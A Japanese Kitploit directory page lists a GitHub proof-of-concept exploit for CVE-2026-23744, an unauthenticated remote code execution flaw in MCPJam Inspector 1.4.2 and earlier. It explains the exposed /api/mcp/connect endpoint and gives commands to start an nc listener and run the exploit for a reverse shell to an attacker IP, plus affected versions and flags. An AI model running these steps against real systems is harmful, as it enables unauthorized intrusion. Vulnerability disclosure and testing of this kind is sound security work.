Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — MCPJam Inspector <= 1.4.2 における未認証のリモートコード実行脆弱性の概念実証エクスプロイト。 | Kitploit
ツール/GitHubGitHub/0xsoulaimane/cve-2026-23744-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHub0xsoulaimane/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — MCPJam Inspector <= 1.4.2 における未認証のリモートコード実行脆弱性の概念実証エクスプロイト。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23744 — MCPJam Inspector 未認証RCE

Python CVE Platform

MCPJam Inspector <= 1.4.2 はデフォルトで 0.0.0.0 にバインドし、認証なしで /api/mcp/connect を公開します。このエンドポイントはホスト上で直接プロセスを起動する serverConfig オブジェクトを受け付けるため、リバースシェルのペイロードを渡すことで認証情報を必要とせず即座にRCEが可能となります。


要件

root@kitploit:~
pip install requests

使用方法

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]

リバースシェルの例

ステップ1 — リスナーを起動:

root@kitploit:~
nc -lvnp 4444

ステップ2 — エクスプロイトを実行:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

ペイロードメソッド

ターゲット上で busybox が動作しない場合は、他のメソッドを試してください:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

影響を受けるバージョン

ソフトウェア脆弱性あり修正済み
MCPJam Inspector<= 1.4.21.4.3

参考資料

  • CrowdSec CVE Tracker — CVE-2026-23744
  • MCPJam Inspector GitHub
ツールをダウンロード
フラグ説明デフォルト
-uターゲットURL必須
-iリスナーIP (LHOST)必須
-pリスナーポート (LPORT)必須
-mペイロードメソッド: busybox, bash, python3busybox